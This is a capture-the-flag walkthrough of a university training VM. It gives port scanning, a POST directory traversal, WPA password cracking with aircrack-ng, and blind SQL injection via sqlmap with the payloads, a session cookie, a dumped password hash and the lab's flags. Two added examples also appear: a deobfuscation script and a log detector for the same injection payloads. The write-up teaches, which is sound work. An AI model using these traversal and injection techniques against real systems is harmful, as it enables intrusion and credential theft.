If you are interested in how I found all the flags, welcome!
Let's start; the IP address can be found after the VM is booted.
If you do not want to read the whole write-up below, here are some little hints:
1) Have a look at the SSL certificate
3) Have a look at the page sources on tcp/15020
4) Find the webdir with the network traffic dump, recover the password and use it
5) Find the SQL injection in the admin area
Below you can find my own way of getting the flags.
Nmap helps us with enumerating open ports:
Not shown: 65526 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
4369/tcp open epmd
5222/tcp open xmpp-client
5269/tcp open xmpp-server
5280/tcp open xmpp-bosh
15020/tcp open unknown
37833/tcp open unknown
The next step is to detect service and OS versions; use these Nmap options: -A -sV
Ok, we have an updated Debian with a patched ProFTPD 1.3.5b, a Jabber service and some http/https services.
The first flag is very easy, it is located in the SSL certificate data on tcp/15020: France: a51f0eda836e4461c3316a2ec9dad743
At first look I was not convinced that it was a flag, but when I had found all the other flags and only one was left, I decided that it was a flag, because I could not verify it anywhere =)
Let's continue with the web services, and what we usually do as the first step - yeah, brute-force subdirs!
To solve this one, just follow the steps back with _0xb252x4 and you get the flag:
_0xb252x4 += 4469; // reverse step 3: strip the appended string "4469" => 77779673
_0xb252x4 -= 234562221224; // reverse step 2: add 234562221224 back => 777796734469
_0xb252x4 *= 1988; // reverse step 1: divide by 1988 => 543234513245
document[_0xeb5f](_0xeb5f)[_0xeb5f]= _0xeb5f+ _0xb252x5
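The reversal of the _0xb252x4 chain above, written out as an added example (it is not code from the original write-up or the VM): it shows why the first step is undone by stripping a string rather than subtracting, because the variable starts as a string, so += concatenates while -= and *= coerce it back to a number. The constants are the page's; the seed "77779673" is the value the comments above recover.

```javascript
// Added example, not from the write-up. Forward direction, as the obfuscated
// script computes it: the value starts as a STRING, so "+= 4469" appends the
// characters "4469"; "-=" and "*=" then force numeric coercion.
function obfuscate(seed) {
  let x = String(seed);   // e.g. "77779673"
  x += 4469;              // string + number => "777796734469"
  x -= 234562221224;      // coerced to a number => 543234513245
  x *= 1988;              // => 1079950212331060
  return x;
}

// Reverse direction: undo the steps in the opposite order.
function deobfuscate(value) {
  const afterDiv = value / 1988;             // 543234513245
  const afterAdd = afterDiv + 234562221224;  // 777796734469
  const asString = String(afterAdd);
  if (!asString.endsWith("4469")) {
    throw new Error("value is not a product of this chain");
  }
  return asString.slice(0, -4);              // "77779673"
}

// The reversal is only exact while every intermediate value stays below
// Number.MAX_SAFE_INTEGER, where doubles still represent integers exactly.
function roundTrips(seed) {
  const v = obfuscate(seed);
  return Number.isSafeInteger(v) && deobfuscate(v) === String(seed);
}
```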
Ok, these two flags I got very fast, and later I got stuck a little with the web site on tcp/15020 before I saw a commented message about download.php in the page source at http://192.168.56.102/blog/:
The message about the image parameter tells us that we have to use a POST request, and probably it is a directory traversal!
I created a simple POST request in Burp and verified it.
And the web server's response:
Now we can read files that are accessible to the web service, and from the BLOG we remember a comment from Kevin that flag.txt is located in his home, so let's check /home/kevin/flag.txt.
The third flag is captured: Croatia: e4d49769b40647eddda2fe3041b9564c
Ok, 3 flags.. I found the webdir /admin in the blog and tried to find, enumerate and dump all data from the host - no luck; the sensitive files are in admin, with a possible SQL injection vulnerability. The data grabbed from the host was a little bit useless...
I got all the usernames, tried to brute-force FTP, SSH and the admin web panel on the blog web site, got a MySQL username and password - no luck, no way to connect to the MySQL server...
It was time to think once again; "ENUMERATION IS THE KEY" appeared in my head and I started an extended webdir brute-force. The result was very nice - a new webdir named /vault.
Now there are 300 webdirs named DoorX with 100 subdirs VaultX in each; time to create a simple Python script to generate "wordlists" and fire up Burp Intruder, since there is probably something useful in one of these dirs.
# Python 3; generates the VaultX wordlist (a DoorX list is produced the same way with range(1, 301))
for i in range(1, 101):
    print("Vault" + str(i))
Two non-empty webdirs were uncovered:
A quick look at ctf.cap gave an attack vector: recover the WPA password and see what can be done with it (there is also rockyou.zip...) =)
It is aircrack-ng time: aircrack-ng ctf.cap -w rockyou.txt
Password found: minion.666. Nothing interesting was found in the network traffic dump, so I decided to try this password on /blog/admin, and it works!
Log in and look at the page source - the fourth flag: Philippines: 551d3350f100afc6fac0e4b48d44d380
It is time to find the final flag. Signed in to the admin panel, I tried things like editing and deleting posts - nothing, but from the source code I remembered that edit.php is probably vulnerable to SQL injection.
It is time for SQLMap (because I like it):
//Do not forget about admin cookie =)
sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36'
and it is vulnerable:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9485=9485
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 3390=BENCHMARK(5000000,MD5(0x554e4b4a))
The next steps, enumerating all tables and columns, are not so interesting. Finally I got all the column names, but SQLMap could not dump the data; still, we have a SQL injection, so we can use an SQL query to dump the data manually.
Tables:
| comments |
| posts |
| users |
Columns:
| Column | Type |
| id | numeric |
| idcountry | numeric |
| login | non-numeric |
| password | non-numeric |
| published | numeric |
| text | non-numeric |
| title | non-numeric |
sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36' --sql-query='select id,idcountry,login,password from users where id=1'
[*] 1, , admin, 8ae100f50c9bbcfeb2ab87b72a03273d - this is the admin's password hash, i.e. minion.666
Change to id=2 and you get the flag for Laos.
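From the defender's side, the two sqlmap payload shapes shown above against edit.php?id= (boolean-based "AND n=n" and time-based BENCHMARK()) are easy to spot in web-server logs. The following detector is an added example, not part of the write-up; the access-log format and every line in SAMPLE_LOG are constructed for it.

```javascript
// Added example, not from the write-up. Constructed access-log lines; the
// payloads in lines 2 and 3 are the ones sqlmap reported above, URL-encoded
// the way a server would log them.
const SAMPLE_LOG = [
  '192.168.56.1 - - [10/Oct/2017:10:00:01 +0000] "GET /blog/admin/edit.php?id=1 HTTP/1.1" 200 512',
  '192.168.56.1 - - [10/Oct/2017:10:00:02 +0000] "GET /blog/admin/edit.php?id=1%20AND%209485%3D9485 HTTP/1.1" 200 512',
  '192.168.56.1 - - [10/Oct/2017:10:00:03 +0000] "GET /blog/admin/edit.php?id=1%20AND%203390%3DBENCHMARK(5000000,MD5(0x554e4b4a)) HTTP/1.1" 200 512',
  '192.168.56.1 - - [10/Oct/2017:10:00:04 +0000] "GET /blog/index.php?id=2 HTTP/1.1" 200 2048',
];

// Rules are matched against the DECODED value of each query parameter, so
// URL-encoding of spaces and "=" does not hide the payload.
const RULES = [
  { name: "boolean-blind", re: /\bAND\s+\d+\s*=\s*\d+\b/i },
  { name: "time-blind-benchmark", re: /\bBENCHMARK\s*\(/i },
];

// Pull the raw query string out of an access-log request line; null if none.
function queryOf(line) {
  const m = line.match(/"(?:GET|POST)\s+\S*?\?(\S*)\s+HTTP\//);
  return m ? m[1] : null;
}

// Scan log lines; returns [{ line, param, rule }] for every rule hit.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const q = queryOf(line);
    if (q === null) return;
    for (const [param, value] of new URLSearchParams(q)) { // decodes %xx
      for (const rule of RULES) {
        if (rule.re.test(value)) findings.push({ line: idx, param, rule: rule.name });
      }
    }
  });
  return findings;
}
```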
Finally all flags are captured.
Thank you to Suceava University for this VM!
That's all, thank you for reading!